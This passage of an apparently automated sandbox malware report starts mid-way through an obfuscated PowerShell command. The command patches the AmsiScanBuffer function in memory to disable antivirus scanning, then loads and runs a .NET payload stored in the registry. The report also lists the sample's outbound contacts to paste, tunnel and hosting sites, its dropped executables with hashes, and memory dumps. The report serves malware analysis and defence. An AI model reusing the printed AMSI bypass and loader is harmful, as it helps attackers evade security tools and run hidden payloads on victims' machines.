$_.Location.Split('\')[-1].Equals(''+'S'+'yst'+[Char](101)+'m'+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+'f'+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+'a'+''+'f'+'e'+'N'+'a'+[Char](116)+''+'i'+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$UwhsKRdzZLpraa=$iRZqyXNIegaeS.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'ta'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BMYUlwceETOPJwTxNXQ=khEvmJBtshVX @([String])([IntPtr]);$YRIxwbdZdnFGFrGQyhiRkn=khEvmJBtshVX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pEJTPQItssx=$iRZqyXNIegaeS.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+'.'+''+'d'+'l'+'l'+'')));$ockUfoIsXxYlVw=$UwhsKRdzZLpraa.Invoke($Null,@([Object]$pEJTPQItssx,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$qRrgKWEGuCrFClIBJ=$UwhsKRdzZLpraa.Invoke($Null,@([Object]$pEJTPQItssx,[Object]('V'+[Char](105)+''+'r'+'t'+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+'c'+'t')));$CryTeZU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ockUfoIsXxYlVw,$BMYUlwceETOPJwTxNXQ).Invoke(''+[Char](97)+''+[Char](109)+'si'+[Char](46)+''+'d'+''+[Char](108)+'l');$mtGoZxPujBZxllrIJ=$UwhsKRdzZLpraa.Invoke($Null,@([Object]$CryTeZU,[Object]('Am'+'s'+''+'i'+''+'S'+''+[Char](99)+''+'a'+'nB'+[Char](117)+''+'f'+''+'f'+'er')));$RDxjFzgIor=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qRrgKWEGuCrFClIBJ,$YRIxwbdZdnFGFrGQyhiRkn).Invoke($mtGoZxPujBZxllrIJ,[uint32]8,4,[ref]$RDxjFzgIor);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mtGoZxPujBZxllrIJ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qRrgKWEGuCrFClIBJ,$YRIxwbdZdnFGFrGQyhiRkn).Invoke($mtGoZxPujBZxllrIJ,[uint32]8,0x20,[ref]$RDxjFzgIor);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'x'+''+[Char](52)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f4abbf06-ac8c-4d1f-baee-1bc9501f736a}
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.75.40:80 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 40.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.156:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | 156.58.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | news-accept.gl.at.ply.gg | udp |
| US | 147.185.221.20:24727 | news-accept.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 20.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wiznon.000webhostapp.com | udp |
| US | 145.14.144.143:443 | wiznon.000webhostapp.com | tcp |
| US | 8.8.8.8:53 | udp |
Files
memory/4616-6-0x00007FFBBED23000-0x00007FFBBED24000-memory.dmp
memory/4616-7-0x000001D939EA0000-0x000001D939EC2000-memory.dmp
memory/4616-9-0x00007FFBBED20000-0x00007FFBBF70C000-memory.dmp
memory/4616-11-0x00007FFBBED20000-0x00007FFBBF70C000-memory.dmp
memory/4616-12-0x000001D952550000-0x000001D9525C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tcb2pdvq.fst.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4616-31-0x000001D952CB0000-0x000001D952E72000-memory.dmp
C:\Windows\svchost32.exe
| MD5 | de68372979221ee19e301cd657bdb1b6 |
| SHA1 | 4266ce79f32422735a99259c27749b6d7fbe158e |
| SHA256 | 720747405e106709767314b8a58bb754aee0f2bcc568440d757aaab17a181f6a |
| SHA512 | 3c80bf8e5dda4a7fb9837e7098f5682651026ba41396fb18221ba96fa61e22961abc22e60760e719ce5300663ba18877aed60bd2106198eb6bf69030ce4fee16 |
memory/4528-50-0x00000000009E0000-0x0000000000A14000-memory.dmp
memory/4616-51-0x00007FFBBED20000-0x00007FFBBF70C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\x4s.exe
| MD5 | 7d333fbc75b9264d3b631861794a7641 |
| SHA1 | 165e2b6ad994fe9bab44154e3812b2e8825dfa76 |
| SHA256 | b98612934cc154c292502370baca4769f1fccad2c79c17237d23ffd5926180bf |
| SHA512 | 54408249ba56c7c19f41c8d35113f306f0fa62c6f5331993945504d09075977346eb40465107d4fab44159a46bd0048d8ea265d31b57d16294420552353175b3 |
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
| MD5 | 8a7bee2c8cec6ac50bc42fe03d3231e6 |
| SHA1 | ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d |
| SHA256 | c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8 |
| SHA512 | 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5 |
memory/1284-62-0x0000000000230000-0x000000000023E000-memory.dmp
memory/4704-87-0x00000278C9C90000-0x00000278C9CBA000-memory.dmp
memory/4704-89-0x00007FFBD8500000-0x00007FFBD85AE000-memory.dmp
memory/4704-88-0x00007FFBDAEE0000-0x00007FFBDB0BB000-memory.dmp
memory/1392-93-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1392-95-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1392-92-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1392-91-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1392-90-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1392-100-0x00007FFBD8500000-0x00007FFBD85AE000-memory.dmp
memory/1392-99-0x00007FFBDAEE0000-0x00007FFBDB0BB000-memory.dmp
memory/1392-101-0x0000000140000000-0x0000000140008000-memory.dmp
memory/584-104-0x000001C0EAF50000-0x000001C0EAF76000-memory.dmp
memory/584-105-0x000001C0EAF80000-0x000001C0EAFAC000-memory.dmp
memory/584-106-0x000001C0EAF80000-0x000001C0EAFAC000-memory.dmp
memory/584-113-0x00007FFB9AF70000-0x00007FFB9AF80000-memory.dmp
memory/636-124-0x00007FFB9AF70000-0x00007FFB9AF80000-memory.dmp
memory/636-123-0x000001E7A60A0000-0x000001E7A60CC000-memory.dmp
memory/636-118-0x000001E7A60A0000-0x000001E7A60CC000-memory.dmp
memory/584-112-0x000001C0EAF80000-0x000001C0EAFAC000-memory.dmp
memory/736-134-0x0000027A6C400000-0x0000027A6C42C000-memory.dmp
memory/736-135-0x00007FFB9AF70000-0x00007FFB9AF80000-memory.dmp
memory/736-128-0x0000027A6C400000-0x0000027A6C42C000-memory.dmp
memory/904-146-0x00007FFB9AF70000-0x00007FFB9AF80000-memory.dmp
memory/904-145-0x00000163B2C70000-0x00000163B2C9C000-memory.dmp
memory/904-139-0x00000163B2C70000-0x00000163B2C9C000-memory.dmp
memory/1008-150-0x0000023CA6250000-0x0000023CA627C000-memory.dmp
memory/1284-765-0x0000000000A30000-0x0000000000A3E000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 06:38
Reported
2024-06-15 06:41
Platform
win7-20240508-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Processes
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\Ramo 🖤.jpg"